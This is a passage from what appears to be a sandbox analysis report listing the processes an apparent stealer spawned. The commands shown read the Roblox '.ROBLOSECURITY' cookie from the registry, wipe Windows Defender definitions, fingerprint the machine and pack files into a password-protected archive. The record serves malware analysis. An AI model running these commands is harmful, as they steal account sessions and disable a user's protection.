                                                                                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5209.tmp" "c:\Users\user\AppData\Local\Temp\bexzy300\CSC6721B5F011FD4FBD8DF74B583831980.TMP"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7951e0000
                                                                                                                                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                                                                                  Start time:01:19:27
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                                                                                                  Start time:01:19:27
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:75
                                                                                                                                                                                                                                                                  Start time:01:19:28
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:76
                                                                                                                                                                                                                                                                  Start time:01:19:28
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:77
                                                                                                                                                                                                                                                                  Start time:01:19:28
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:getmac
                                                                                                                                                                                                                                                                  Imagebase:0x7ff635830000
                                                                                                                                                                                                                                                                  File size:90'112 bytes
                                                                                                                                                                                                                                                                  MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:78
                                                                                                                                                                                                                                                                  Start time:01:19:28
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:79
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:80
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:81
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:82
                                                                                                                                                                                                                                                                  Start time:02:36:05
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:83
                                                                                                                                                                                                                                                                  Start time:02:36:06
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff649440000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:84
                                                                                                                                                                                                                                                                  Start time:02:36:06
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:85
                                                                                                                                                                                                                                                                  Start time:02:36:07
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:86
                                                                                                                                                                                                                                                                  Start time:02:36:07
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:87
                                                                                                                                                                                                                                                                  Start time:02:36:07
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:88
                                                                                                                                                                                                                                                                  Start time:02:36:08
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:89
                                                                                                                                                                                                                                                                  Start time:02:36:08
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:90
                                                                                                                                                                                                                                                                  Start time:02:36:08
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tree /A /F
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6bd590000
                                                                                                                                                                                                                                                                  File size:20'992 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:91
                                                                                                                                                                                                                                                                  Start time:02:36:08
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:92
                                                                                                                                                                                                                                                                  Start time:02:36:08
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:93
                                                                                                                                                                                                                                                                  Start time:02:36:09
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:94
                                                                                                                                                                                                                                                                  Start time:02:36:10
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6b6530000
                                                                                                                                                                                                                                                                  File size:468'120 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:95
                                                                                                                                                                                                                                                                  Start time:02:36:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:96
                                                                                                                                                                                                                                                                  Start time:02:36:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:97
                                                                                                                                                                                                                                                                  Start time:02:36:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\_MEI33962\rar.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\_MEI33962\rar.exe a -r -hp"Cribry10" "C:\Users\user~1\AppData\Local\Temp\aaDHy.zip" *
                                                                                                                                                                                                                                                                  Imagebase:0x7ff708090000
                                                                                                                                                                                                                                                                  File size:630'736 bytes
                                                                                                                                                                                                                                                                  MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:98
                                                                                                                                                                                                                                                                  Start time:02:36:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:99
                                                                                                                                                                                                                                                                  Start time:02:36:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:100
                                                                                                                                                                                                                                                                  Start time:02:36:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic os get Caption
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:101
                                                                                                                                                                                                                                                                  Start time:02:36:18
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:102
                                                                                                                                                                                                                                                                  Start time:02:36:18
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:103
                                                                                                                                                                                                                                                                  Start time:02:36:18
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:104
                                                                                                                                                                                                                                                                  Start time:02:36:19
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:105
                                                                                                                                                                                                                                                                  Start time:02:36:19
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
